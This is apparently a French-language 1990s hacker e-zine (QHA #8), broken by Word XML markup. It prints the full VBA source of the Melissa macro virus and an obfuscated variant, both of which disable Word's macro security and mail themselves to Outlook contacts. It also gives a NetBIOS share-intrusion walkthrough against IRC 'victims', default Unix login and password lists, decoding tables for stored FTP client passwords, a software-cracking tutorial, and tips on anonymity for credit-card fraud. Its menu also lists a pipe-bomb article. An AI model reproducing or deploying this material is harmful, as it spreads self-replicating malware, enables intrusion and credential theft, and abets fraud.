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             __                 __         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QQQQQQ\        |HH|              |HH|     /AAAA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 |QQ|      |HH|              |HH|     |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QQ|      |HH|______|HH|     |AA|______|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_|QQ|      |HHHHHHHHH|     |AAAAA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        |QQQQ|      |HHHHHHHHH|     |AAAAAAA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__   |QQQQ|       |HH|¯¯¯¯¯¯|HH|     |AA|¯¯¯¯¯¯ |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QQQQQQQQ\      |HH|              |HH|     |AA\             /A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QQQ|     |HH|              |HH|     |AAA|       |AAA|</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       ¯¯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b/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">    "We Are Everywhere"</w:t>
        <w:tab/>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
        <w:t xml:space="preserve">                       *                           QHA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E-Zine #8                          *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
        <w:t xml:space="preserve">                       *            http://www.qharulez.com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 xml:space="preserve">                       *                 dukest4r@hehe.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b/>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Introdu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Bienvenu a notre E-zine #8, Ce e-zine devrais etre un peu plus petit qu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es autres a cause de l'effort fourni pour finir notre e-zine #10 (1mb)</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onc svp chialer pas d'la grosseur c'est pas de notre faute... heh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Avertiss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b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Veuillez prendre note que tout ce qui est inscrit dans ce qui suit n'est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 xml:space="preserve">qu'a but educatif. Les auteurs de ces articles retirent la responsabilite de c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 xml:space="preserve">que vous en faites. En bon quebecois "C pas notre probleme sti". Et avant d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continuer n'oubliez pas que vous n'avez aucun droit de copier ces articl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rPr>
        <w:t xml:space="preserve">QHA Menu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8.1 L'anonymité sur internet, par Wu-TaNG                                                                        |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-35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8.2 Virii, par th[|}x]                                                                                                                    |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-35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8.3 ??????vive windows 95/98 par th[|}x]                                                                             |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-35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8.4 La base du hacking, par  th[|}x]                                                                                        |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-35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8.5 Pipe-Bomb (complément), par T\\'ISTER                                                                        |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:right="-35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8.6 IRC Controlling, par Cable-Kill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________________________________________________________________))==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L'anonymité sur internet, par Wu-Ta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s en avez plein votre criss de casse des conneries du sty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urrent IP Address: 24.226.210.XX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aters be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number is the current IP address of your machine. It is being recorded in our user database so we may trace and investigate disputes or fraudulent use of credit cards. Abuse of credit cards will be persued by our lawyers and will result in heavy fines and cancellation of the offenders Internet acc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and vous essayez de carder un site? Vous voulez pas vous faire pogné quand vous faitent des conneries sur l'internet? Solution : Lire mon putain d'arctic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ur être anonyme sur l'internet, l'utilisation de proxy est cruciale. Qu'est-ce qu'un  proxy me direz vous? Explic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 gros, un proxy est un serveur qui va chercher des informations a votre place sur un autre serveur et qui vous la rapporte "supposément" plus rapidement. Nous la vitesse c pas compliqué, on s'en criss. Tout ce qu'on veux c'est d'être anonyme. En allant chercher les infos a nôtre place, l'autre serveur log le proxy a la place de nous loger nous! comment l'utiliser? c'est très simple! Suivez les quelques étapes suivantes et en quelques minutes vous serez anonyme a 90% ! Je dis bien 90% alors déconnez pas trop avec ca parce que si vous vous en pettez les couilles venez pas me revoir après et me gueuler dess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ment utiliser un Prox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èrement -= Aller chercher les utilitaires nécéssa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Allez vous chercher "A4Proxy". Je l'ai trouvé sur www.neworder.box.sk dans la section #Anonymity. ( ou aller sur www.anonymity.com mais ca coûte de l'argent faque personnellement y peuvent ben manger d'la mar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ièmement -= Configurer votre Prox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Installez A4Prox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Lancez A4Proxy. Allez dans "Proxy Check". Bon la une dizaine de serveur Proxy devrait s'afficher. Sélectionnez en 1 et cochez Reset Data en bas. Ensuite faitent Check Proxy situé juste a côté de Reset Proxy. Quand vous aurez trouvé un proxy assez rapide et anonyme pour vous vous avez juste a le mettre par défa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ièmement -= Configurer votre Proxy dans vos paramètre de connection à intern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Ouvrir le Panneau de configur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Aller dans Option Internet. Une fois dans Option Internet, allez dans Connexions. Sélectionnez votre connection et allez dans les paramètre. Si c'est une connection Dial-Up (modem normal) clickez dessus et faite "paramètres...". Si c'est une connection LAN (par cable) faitent Paramètres L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Une fois dans vos Paramètre de connection vous avez juste à cocher "Utiliser un serveur Proxy et entrer l'addresse ip du serveur choisie et enter le port (toujours 80 ou 808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ILA QUI EST FAIT! Avec ça les sites auront beaucoup plus de difficulté a vous trac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 Pour encore plus d'anonymiter, allez dans A4Proxy, ensuite dans Proxy Option, et cochez "use new proxy on each request" et "Check for anonymity on each requ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Virii, par th[|}x]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VICTORIA:</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vate NM9D() As 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vate Jk4tn() As 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vate XL2o() As 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vate To6i As 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vate Sub Document_Op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 Error Resume Ne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andomize: If Rnd &gt; 0.6 Then Lm2jv</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Su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vate Sub Document_Cl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 Error Resume Ne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andomize: If Rnd &gt; 0.6 Then Lm2jv</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Su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vate Sub Lm2jv()</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System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") &lt;&gt; ""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mandBars("Macro").Controls("Security...").Enabled = Fal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ystem.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&am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l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mandBars("Tools").Controls("Macro").Enabled = False     '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tions.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 -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m Rm4gU, K0t, Xy9ti   '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t Rm4gU = CreateObject("Outlook.Applic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t K0t = Rm4gU.GetNameSpace("MAPI")   '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System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "C1x?") &lt;&gt; "Gp5Xr"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Rm4gU = "Outlook"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0t.Logon "profile", "passwo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D7R = 1 To K0t.AddressLists.Cou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t Qt3tq = K0t.AddressLists(D7R)    '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u1R =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t Xy9ti = Rm4gU.CreateItem(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T6e = 1 To Qt3tq.AddressEntries.Cou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2P = Qt3tq.AddressEntries(Au1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Xy9ti.Recipients.Add J2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u1R = Au1R +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Au1R &gt; 50 Then T6e = Qt3tq.AddressEntries.Cou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xt T6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Xy9ti.Subject = "Your ma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Xy9ti.Body = "How's this?" + Chr$(13) + Application.UserN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Xy9ti.Attachments.Add ActiveDocument.FullN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Xy9ti.Se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2P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xt D7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0t.Logo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ystem.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "C1x?") = "Gp5X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t Td7x1 = ActiveDocument.VBProject.VBComponents.Item(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t RV8Q1 = NormalTemplate.VBProject.VBComponents.Item(1)    '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1d = RV8Q1.CodeModule.CountOfLi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6r = Td7x1.CodeModule.CountOfLi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z3c = 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Td7x1.Name &lt;&gt; "Fg2c"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B6r &gt; 0 Then Td7x1.CodeModule.DeleteLines 1, B6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t Ih0M = Td7x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d7x1.Name = "Fg2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n2zR = Tr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RV8Q1.Name &lt;&gt; "Fg2c"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D1d &gt; 0 Then RV8Q1.CodeModule.DeleteLines 1, D1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t Ih0M = RV8Q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V8Q1.Name = "Fg2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j5y = Tr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 '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Gj5y &lt;&gt; True And Wn2zR &lt;&gt; True Then GoTo Yt9q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Gj5y = True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c4vu Td7x1.CodeModule, Ih0M.CodeModu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Wn2zR = True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c4vu RV8Q1.CodeModule, Ih0M.CodeModu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t9qC:  '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D1d &lt;&gt; 0 And B6r = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then        '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ctiveDocument.SaveAs FileName:=ActiveDocument.FullName   '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lseIf (InStr(1, ActiveDocument.Name, "Document") &lt;&gt; False)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ctiveDocument.Saved = True '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Su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vate Sub P5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im Jk4tn(5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1) = "Wc4v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2) = "P5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3) = "NM9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4) = "Jk4t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5) = "XL2o"    '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6) = "To6i"    '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7) = "ID2K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8) = "H2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9) = "Q6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10) = "E7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11) = "Ze6F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12) = "Ve7Fv"</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13) = "C5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14) = "Ac4G"    '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15) = "L1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16) = "F6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17) = "Qz9y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18) = "CI1j"</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19) = "Qg1s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20) = "X3J%"</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21) = "Vs1fb%"    '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22) = "S4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23) = "Jo5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24) = "I6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25) = "Zo4n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26) = "Vc4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27) = "Ov1d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28) = "L5Z"    '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29) = "Lq5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30) = "Lm2jv"</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31) = "Rm4g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32) = "K0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33) = "Xy9t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34) = "C1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35) = "Gp5X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36) = "D7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37) = "Au1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38) = "T6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39) = "Qt3tq"</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40) = "J2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41) = "Td7x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42) = "RV8Q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43) = "D1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44) = "B6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45) = "Qz3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46) = "Fg2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47) = "Ih0M"    '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48) = "Wn2z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49) = "Gj5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k4tn(50) = "Yt9q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Su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vate Sub Wc4vu(ID2Ki, H2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im NM9D(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im Jk4tn(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im XL2o(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m Q6d As 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I = 1 To ID2Ki.CountOfLi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6d = ID2Ki.Lines(I,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Trim(Q6d) &lt;&gt; "" Then L5Z Q6d,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xt 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7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2f.DeleteLines 1, H2f.CountOfLi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2f.AddFromStr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I = 1 To ID2Ki.CountOfLi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6d = ID2Ki.Lines(I,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Trim(Q6d) &lt;&gt; ""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6i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5Z Q6d, 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Rnd &lt; 0.1 Then To6i = To6i + " ' " + "Qg1s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2f.InsertLines H2f.CountOfLines + 1, To6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xt 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Su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vate Sub Ov1dd(Ve7Fv As String, C5m As Integ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Ze6Fm = Left$(Ve7Fv, 1) = Chr$(34) And Right$(Ve7Fv, 1) = Chr$(34) And Len(Ve7Fv) &gt; 2                  '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Ze6Fm Then Ve7Fv = Mid$(Ve7Fv, 2, Len(Ve7Fv) - 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c4G = UCase$(Left$(Ve7Fv, 1)) &gt;= "A" And UCase$(Left$(Ve7Fv, 1)) &lt;= "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q5a = UCase$(Right$(Ve7Fv,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C5m = 1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Ac4G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X3J% = 1 To UBound(NM9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Ve7Fv = NM9D(X3J%) Then Exit Su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xt X3J%</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im Preserve NM9D(UBound(NM9D) +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M9D(UBound(NM9D)) = Ve7Fv</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it Su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Ac4G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X3J% = 1 To UBound(Jk4t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Ve7Fv = Jk4tn(X3J%)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7Fv = XL2o(X3J%)</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Lq5a &lt; "A" Or Lq5a &gt; "Z" Then Ve7Fv = Ve7Fv + Lq5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it F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 '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xt X3J%</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Ze6Fm Then Ve7Fv = Chr$(34) + Ve7Fv + Chr$(3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To6i &lt;&gt; ""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Right$(To6i, 1) &lt;&gt; "." And Left$(Ve7Fv, 1) &lt;&gt; "." Then Ve7Fv = " " + Ve7Fv         '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6i = To6i + Ve7Fv</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Su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vate Sub E7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5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im Preserve XL2o(UBound(Jk4t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X3J% = 1 To UBound(XL2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1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6p = Int(Rnd * 3) + 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z9yi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Vs1fb% = 1 To F6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I1j = Chr$(97 + Int(Rnd * 2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Vs1fb% = 1 Or Rnd &gt; 0.8 Then CI1j = UCase$(CI1j)    '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Vs1fb% = 1 + Int(F6p / 2) Then CI1j = Chr$(48 + Rnd * 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z9yi = Qz9yi + CI1j</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xt Vs1f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Vs1fb% = 1 To UBound(NM9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Qz9yi = NM9D(Vs1fb%) Then GoTo L1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xt Vs1f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Vs1fb% = 1 To X3J% -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Qz9yi = XL2o(Vs1fb%) Then GoTo L1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xt Vs1f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XL2o(X3J%) = Qz9y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xt X3J%</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Su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vate Sub L5Z(Q6d As String, C5m As Integ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m Ve7Fv As St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m CI1j As String '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6d = LTrim(Q6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Zo4ni = Fal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Len(Q6d) = 0 Then Exit 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4u% =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I1j = UCase$(Left$(Q6d,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6b = (CI1j &gt;= "A" And CI1j &lt;= "Z") Or (CI1j &gt;= "0" And CI1j &lt;= "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S4u% &gt; Len(Q6d) Then Exit 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I1j = Mid$(Q6d, S4u%,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CI1j = Chr$(34)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Zo4ni Then S4u% = S4u% + 1: Exit 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Zo4ni = True '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Not Zo4ni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I6b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CI1j = "$" Or CI1j = "%" Or CI1j = "&amp;" Then S4u% = S4u% + 1: Exit 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CI1j = "!" Or CI1j = "#" Then S4u% = S4u% + 1: Exit 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c4b = UCase$(CI1j) &gt;= "A" And UCase$(CI1j) &lt;= "Z"       ' T1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c4b = Vc4b Or (CI1j &gt;= "0" And CI1j &lt;= "9") Or CI1j = "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I6b &lt;&gt; Vc4b Then Exit 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CI1j &lt; Chr$(33) Or CI1j &gt; Chr$(127) Then Exit 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4u% = S4u% +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7Fv = Left$(Q6d, S4u% -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6d = Right$(Q6d, Len(Q6d) - (S4u% -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Left$(Ve7Fv, 1) = "'" Or Ve7Fv = "Rem" Then Exit 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v1dd Ve7Fv, C5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Su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MELISSA:</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vate Sub Document_Op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Error Resume Ne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System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") &lt;&gt; ""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andBars("Macro").Controls("Security...").Enabled = Fal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ystem.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&am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l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andBars("Tools").Controls("Macro").Enabled = Fal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ptions.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 -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m UngaDasOutlook, DasMapiName, BreakUmOffASl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t UngaDasOutlook = CreateObject("Outlook.Applic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t DasMapiName = UngaDasOutlook.GetNameSpace("MAP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System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") &lt;&gt; "... by TH[|}X]"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 UngaDasOutlook = "Outlook"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sMapiName.Logon "profile", "passwo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 y = 1 To DasMapiName.AddressLists.Cou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t AddyBook = DasMapiName.AddressLists(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 =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t BreakUmOffASlice = UngaDasOutlook.CreateItem(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 oo = 1 To AddyBook.AddressEntries.Cou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ep = AddyBook.AddressEntries(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reakUmOffASlice.Recipients.Add Pee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 = x +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 x &gt; 50 Then oo = AddyBook.AddressEntries.Cou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xt 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reakUmOffASlice.Subject = "Important Message From " &amp; Application.UserN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reakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone el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reakUmOffASlice.Attachments.Add ActiveDocument.FullN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reakUmOffASlice.Se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ep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xt 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sMapiName.Logo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ystem.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by TH[|}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t ADI1 = ActiveDocument.VBProject.VBComponents.Item(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t NTI1 = NormalTemplate.VBProject.VBComponents.Item(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TCL = NTI1.CodeModule.CountOfLi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DCL = ADI1.CodeModule.CountOfLi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GN = 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ADI1.Name &lt;&gt; "Melissa"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 ADCL &gt; 0 Then ADI1.CodeModule.DeleteLines 1, ADC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t ToInfect = ADI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I1.Name = "Meliss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AD = Tr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NTI1.Name &lt;&gt; "Melissa"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 NTCL &gt; 0 Then NTI1.CodeModule.DeleteLines 1, NTC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t ToInfect = NTI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TI1.Name = "Meliss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NT = Tr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DoNT &lt;&gt; True And DoAD &lt;&gt; True Then GoTo CY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DoNT = True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 While ADI1.CodeModule.Lines(1, 1)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I1.CodeModule.DeleteLines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o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nfect.CodeModule.AddFromString ("Private Sub Document_Cl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 While ADI1.CodeModule.Lines(BGN, 1) &lt;&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nfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN,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GN = BGN +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o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DoAD = True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 While NTI1.CodeModule.Lines(1, 1)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TI1.CodeModule.DeleteLines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o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nfect.CodeModule.AddFromString ("Private Sub Document_Op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 While NTI1.CodeModule.Lines(BGN, 1) &lt;&g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nfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN,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GN = BGN + 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o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Y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NTCL &lt;&gt; 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False)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ctiveDocument.SaveAs FileName:=ActiveDocument.FullN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lseIf (InStr(1, ActiveDocument.Name, "Document") &lt;&gt; False)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ctiveDocument.Saved = Tr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I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RD/Melissa written by TH[|}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rks in both Word 2000 and Word 9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rm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Dec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rd -&gt; Email | Word 97 &lt;--&gt; Word 2000 ... it's a new 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Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters.  Game's over.  I'm outta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Su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vive windows 95/98 par th[|}x]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ur hacker sous WINDOBE il suffit d'installer le Voisinage réseau (d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nneau de configuration puis Réseau, Ajouter et Serv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t puis d'avoir aussi l'adresse IP d'un gug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Allez dans démarrer puis allez dans exécuter et taper edit (l'éditeur dos) et créer un fichier que vous nommerez "lmhosts" (ATTENTION il doit être en minuscule et NE DOIT PAS porter d'extension *.TXT .. et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Une fois lmhosts créé, le sauver dans le répertoire c:\Wind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Ouvrir une COMMANDE MSDOS et taper ce qui su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nbtstat -A 193.106.105.19 &lt;= L'IP du gug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re les INFO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NetBIOS Remote Machine Name Table Name Type Stat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Hacker&lt;00&gt; UNIQUE Registered &lt;=  Ca c'est bon car UNIQ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racker &lt;00&gt; GROUP  Registered   &lt;=  groupe ca serre a ri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ab/>
        <w:t xml:space="preserve"> </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MAC Address = 44-45-13-74-00-0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cker" et "Cracker" sont des exemples de noms d'ordinateu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Dans lmhosts je me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Hacked by gobpower   &lt;=  #un p'tit baratin de votre choi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193.106.105.19   Hacker</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>&lt;&lt;&lt;&lt;&lt;&lt;  Ip du gugus et le nom de l'ordinat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peut en mettre plusieurs à la suite en récrivant toujours #...... et en dessous IP + nom sans passer de lig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 Retourner sous la fenêtre DOS et tape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nbtstat -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 Obti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uccessful purge and preload of the NBT Remote Cache Name T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Ca marche marche en tarbarnac!! maintenant sous WINDOBE Menu Démarrer Rechercher/Ordinat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ordinateur qui nous intéresse ce nome donc "Hacker", Rechercher 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l le trouve !? Et ben on s'ouvre un cris de bonne biere !!! vous voila dans la machine du gug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7)Parfois il faut donner un mot de passe réseau, vous pouvez essayer un crackeur à force brute qui essaye tous les mots de passe possibles mais cela peut prendre des secondes, des minutes des heures... voir des jou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ps : avec un peu d'imagination on peut trouver le password en essayant par exemple le login ou le nom de l'utilisateur sur IR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Parfois rien n'apparaît car le disque dur n'est pas en réseau et donc on est niqu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ne peut pas toujours effacer les fichiers selon la confi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S : Si vous obtenez des infos confidentielles genres code de lancement des têtes nucléaires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rmée américaine, vous êtes priez de me les faire parvenir sous plis discret de préfér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s remercier ma blonde d'avoir corrigé le plus possible mes fau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ckets et Applications par th[|}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uppose tu veuilles envoyer un fichier a ton pote qui est sur la machine do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dresse est 128.6.4.7. Pour commencer le processus, tu dois savoir pl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qu'une adresse internet. Tu dois te connecter sur un serveur FTP a l'aut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ut. En general, les programmes reseau sont specialises dans ce type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ulot. La plupart des machines ont plein de programmes qui tournent po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erer le transfert de fichiers, le login a distance, courier, serveur fs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arez (arf), etc... Enfin quand tu te connectes sur 128.6.4.7, tu dois d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e tu veux parler au serveur FTP. Ce qui est fait en avant des socke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nus sur chaque serveur. Ye Rappelle que TCP utilise le numero de port po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arder une trace des conversations en cours. Les programmes de l'utilisat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tilisent normalement plus ou moins de ports au hasard, bienque les por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pecifiques sont assignes pour les programmes qui attendent une deman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rticuliere. Par exemple. si tu veux envoyer un fichier, tu commences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ncer ftp, il ouvriera une connection sur un port au hasard, par exe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234, pour le port utilise a l'autre bout. Enfin il specifiera le port 21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utre cote, qui est le port officiel des serveurs ftp. Note quand meme qu'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 a deux differents programmes en cours.. Tu lances ftp de ton cote, Il y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 programme dont le but est d'accepter des commandes depuis ton terminal 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i les balances de l'autre cote, ce programme qui te cause c'est le serv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TP. Il a ete designe pour accepter des commandes depuis la connection resea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ussi une connection est decrite par ces 4 nomb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dresses Internet         Ports TC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nection     128.6.4.194, 128.6.4.7      1234, 2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 333 | o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O - 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I        |    &lt;--- CoD4 &lt;Da KiNG iN a WoRLD o'LaMaH&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___/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t ben donc on peut dire FTP c nul a chier !! Il a besoin de deux connec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l commence comme le mail, et on lui dit "connecte moi sous tel utilisate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ens voila mon mot de passe", "envoie moi ce fichier avec ce nom"... Et d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e tout ca est fait, une seconde connection est ouverte pour les donne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ules. Il serait certainement possible d'envoyer les donnees sur la me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nection, comme SMTP fait, mais bon c comme ca et c tout et arrete de pos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s questions ! :). En fait je vais dire plutot c car les transferts de fi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nt souvent long (merci a billou pour son gros win97 que tout le mon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nvoie en ftp et sature sont pov'rezo). Ceux qui ont cree le ftp o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lu permettre a l'utilisateur de permettre d'envoyer des commandes pend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 transfert, tel que abandonner le transfert en cours, ar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ent cracker un password par th[|}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he cracker un password est un operation courante dans la pratiq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un hacker! Que l'on essaye un connexion telnet sur un unix dist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ntrer un system NT, en tant qu'admin, ou simplement de decoder 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ss oublier, on a tjrs besoin de savoir comment cracker un pa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 plus important dans la teknik du crack de mot de pass c'est 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cultes mentales que l'on va develloper pour arriver a son but! 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rain Stormin est la seule maniere fiable de cracker un pa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n pour commencer dans le cas du crack d'un user sur unix il fa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vant tout tester les options de bases implementes dans le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insi on essayera depuis un telnet les possibilites suivant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 marche defois mais pas quand l'admin a fait son boulot!! he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 v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Login ]-----------[ Passwo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t                ro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oot                machine.server.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t                nom de l'admin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uest               gu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onymous           nick@server.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ser                us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                 ad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ucp                uuc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uucp               an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on                an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ames               ga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stall             inst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boo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mo                dem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mountfsys          umountfs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ync                syn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               adm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emon              daem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is bon ca marche pas tjrs! alors la on peut utiliser un passwo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racker ....prenner mon claimore brute force je les mis disponible sur le s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 seul probleme est que de plus en plus les admins conseill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ir exigent)des utilisateurs un mot de passe comprennant au minim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8 caracteres et des symboles non alphadecimaux par exem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7kjf-5okL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genre de mot qui existe pas dans le dic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l est alors tmp de faire preuve de vos competences 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cial Engineering. Soit vous connaisez physiquement la personne a qui vous essayez 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racker le compte (vous pouvez alors essayer les trucs con du gen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m du/de la petit(e) ami(e), chanson preferee, bookin prefere, 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utres conneries en tout gen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pouvez aussi par exemple accorder a cette personnes un ac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r votre Eggdop (par exemple) en lui demandant un mot de pas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qui risk fort d'etre le meme que celui de son compte unix) Car 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ens ont la facheuse t'endance de reutiliser les mots de pass (manq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 memoir sur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n si rien de cela ne marche va falloir que vous vous demerdie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utr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ns le cas d'un mot de passe sur le Bios de la machine les cho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nt tres compliquees! et la seul un password cracker ou vot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flexion feront que vous penetrerez ou non dans le syst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 bon moyen de trouver des mots de passe est de controler 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ichier .ini des programmes de FTP (CuteFTP, WSftp, et autres) qu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urnant sous windaube, insrcivent les mots de pass codés dans le in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ute la betise etant qu'ils utilisent tjrs le meme encryptage qu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vient donc tres facile a decoder! he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ette technique est tres utiles car les universites, facs, instit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UT, et autres ont presque tjrs deux rezo (un NT un Unix) et donc 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tilisateurs chacun un repetoir personnel sur le rezo NT... Il suff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nc de zoner un peu sur les disks pour trouver les ini des cli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tp et voila :) he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ici le mode de cryptage de WsFTP  sur win9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chier wsftp.in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 61           A = 41          0 = 3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 = 63           B = 43          1 = 3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 = 65           C = 45          2 = 3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 = 67           D = 47          3 = 3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 = 69           E = 49          4 = 3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 = 6B           F = 4B          5 = 3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 = 6D           G = 4D          6 = 3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 = 6F           H = 4F          7 = 3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 71           I = 51          8 = 4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 = 73           J = 53          9 = 4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 = 75           K = 55          &amp; = 2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 = 77           L = 57          é = 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 = 79           M = 59          " = 2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 = 7B           N = 5B          ' = 2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 = 7D           O = 5D          ( = 2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 = 7F           P = 5F          - = 3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 = 81           Q = 61          è = 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 = 83           R = 63          _ = 6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 = 85           S = 65          ç = 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 = 87           T = 67          à = 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 = 89           U = 69          ) = 3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 = 8B           V = 6B          = = 4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 = 8D           W = 6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x = 8F           X = 6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 = 91           Y = 7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z = 93           Z = 7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us remarquerez d'ailleurs que certains caracteres ASCII s'encod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la meme facon! (é,è,ç,à = F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ici maintenant le mode d'encryptage de CuteFTP 2.0 pour win9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 pass sont dans le fichier tree.d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 ©       b = ª       c = «       d = ¬        e = </w:t>
        <w:softHyphen/>
        <w:t xml:space="preserve">       f = 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 = ¯       h =         i = ¡       j = ¢        k = £       l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 = ¥       n = ¦       o = §       p = ¸        q = ¹       r = º</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 = »       t = ¼       u = ½       v = ¾        w = ¿       x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 = ±       z = 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ila faites en bonne usage!! et si vous n'arrivez pas a acceder au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ichiers qui contiennent les pass depuis Windoze essayez sous Do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fois ca marc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d /rep_du_ke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dit tree.dat &gt; c:/mon_rep/passFTP.t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suite editez le fichier passFTP.txt dans votre homedir et voil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La base du hacking, par  TH[|}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Cible : FTP Expert 1.22 (voir 1.2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élécharger la version 1.2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diteur : Visicom Media  www.visic.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ype d'approche : Numéro de Seri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tils : Numega SofIce 3.2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 Le sof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TP expert est un Client FTP =&gt; commeWS_FTP© ou Cute FTP©. Mais il a u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terface à la exploreur windows et en frança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seul blème c'est qu'à chaque fois qu'on quitte, il nous fais chier avec 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ag Screen de mer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 L'approc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figur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avez biensur téléchargé Soft Ice? (Pour ma part je vais travailler ave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3.2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ste à le configurer pour le Crack suiv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ns ce crack on aura besoin de 3 Fenetres (bande) =&gt; On a pas besoin d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gistre donc Taper "WR" pour virer la fenêtre du haut (Si vous l'avez p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la verez, refaire WR pour l'enle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r contre on a besoin de la fenêtre ou s'affiche les instructions =&gt; c'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ne riez pas.... c pas les Water Closed :)))) (par defaut dans win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rmalement, si vous l'avez et que vous l'avez enlever refaite W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t enfin la Fenêtre la plus interessante celle ou l'on voit tout les chti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nnées qu'on a rentré :))) =&gt; "W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avez donc 3 fenêtres (trois bandes) ok. passons au cra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sof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n, vous voyez bien que si vous lancer le programme et le fermer il vous dis =&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sager non enregistré avec de la pub en plus.... saloperie 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 a en plus un timing sur le O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s de panique vous avez repérer le menu enregistr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ide =&gt; Enregistr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l vous demande que 2 donné (Tant mieu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va entrer dans la partie techniq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 Le cra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ns Softice il y a deux commandes que j'aime bi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 breakpoints BPX GET WINDOWTEXTA et BPX GETDLGITEMTEXT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nt marrant parce que j'ai remarqué que si Sof ice réagit avec ses deu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reakpoints, le soft peut être facile.....(je sais pas si ca s'appliq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est u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marque) Alors essayez d'abord ses deux breakpoi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remplis les champs d' enregistrement. (pour moi Nom: OPiUM=Sabosan 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99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TRL + D =&gt; BPX GET WINDOWTEXTA =&gt; return =&gt;CTRL+D =&gt; Retour a FT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pert on clique sur OK =&gt;Mauvais N° et pas de Sof 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che p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efface les Break =&gt; "BC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essaye avec l'aut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remplis les champs d' enregistrement. (pour moi Nom: OPiUM=Sabosan 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99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TRL + D =&gt; BPX GETDLGITEMTEXTA =&gt; return =&gt;CTRL+D =&gt; Retour a FT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pert on clique sur OK =&gt;Mauvais N° et pas de Sof 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che p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efface les Break =&gt; "BC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n ben ca marche pas va falloir utiliser le Breakpoint BPX HMEMCP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e l'aime pas trop celui la parce qu'on arrive direct dans le Kernel et on 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in du soft quelquefo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is bon on n'y v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remplis les champs d' enregistrement. (pour moi Nom: OPiUM=Sabosan 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99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TRL + D =&gt; BPX GETDLGITEMTEXTA =&gt; return =&gt;CTRL+D =&gt; Retour a FT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pert on clique sur OK =&gt;Paffff Soft ice sort ca gueu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n on n'y va doucement vous êtes donc maintenant là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 truc comme Kernel!Log error est écris en haut (en ve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t dans la fenêtre du milieu y a écris : (c'est même sélectionn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ernel!HmemeCp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t Kernel (01) en vert au cent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t c'est écris en bas à gauche FTP Expe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k jusque là c'est b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à on est dans le kernel on s'en tape de ç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me y a 2 Champs on fait F5 =&gt; F1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se retrouve dans USER (0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à il faut tracer. un peu histoire de rentré dans le code de FTP Expe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à vous faites donc F12 environ 4 ou 5 fois vous voyer FTPEXPERT!CO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êtes dans le code FTP Expe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h maintenant on va tenter de chercher le serial a la technique Sabos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vous souvenez du Nom que vous avez mis ? moi : OPiUM=Sabos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n on va le faire rechercher dans sofice ta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 0 l ffffffff 'OPiUM/Sabos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l y a 8 f la) / n'oublier pas les ' ' et respecter les majuscu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voyer apparaitre votre nom dans la fenetre du ha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ias et alors ? ben attende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ites la même avec le faux serial pour voir! (6996 pour mo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 0 l ffffffff '699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reil le serial se bala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t voyez si vous défilez la fenêtre que le nom et proche du serial....Oui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ite encore tracer Softice avec F12 , vous voyer qu'un moment ca retour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us USER ? continuer ......Environ 36 fois pour moi, en fait jusqu'à vous voy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truc qui explose à la yeull....(Faite en sorte qu'en appuyant sur F12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enetre disant que c pas un bon serial arri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est en plein dedans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ppuyer sous F12 et FTP Expert yeull normal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t la Faite voir un recherc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 0 l ffffffff 'OPiUM=Sabos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avez quoi dans la fenetre en ha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éfilez voir la fenetre un peu en haut et en b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 a un bon truc dans le gen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iUM=Sabos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t un peu de connerie en dess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7V4SP-3EFHSB-3MN7NA-Y4SH3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 serait pas notre seri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 ressemble (Y a pas bcp de truc qui ressemble a un serial proche de m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m ou du faux serial) ET C C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 The E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 c'est une technique un peu barbare que j'ai trouver mais bon pour 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etits soft de merde ca marche bien....C'est sûr que c'est pas noble com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chnique mais ca a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vec ce procéder j'ai réussi a trouver les serial de Webexpert / Gif movi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ar/ Rappel tout / Windows Blind et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 fait vous foutez un truc n'imp. et vous espérer que le bon serial et dans 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rag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l y est souvent ;) si les programmeur se font pas ch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elque fois on en voit des trâces, faut pas hésiter à faire défiler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enêtre ou à faire des D EAX ; D EDI etc...d dans le n'imp pour afficher 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gist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rce que si vous êtes dans le coin du sérial, il doit trainer dans le co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ilà ! C'est fini pour ce numér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ENETRATION DES SYSTEMES INFORMATIQU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NDOWS 95/98 par th[|}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BTST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tils nécessai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ndows 95/9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 cerveau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x doig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ere éta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lez sur IRC et sur un channel windows(c'est là que l'on trouve le plus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ctimes), ensuite vous faites un petit /dns nickdelavictime (à faire dans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enêtre principale). Vous voilà en possession de son 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eme éta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intenant, vous ouvrez une fenêtre dos, allez dans le répertoire \wind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uis tapez 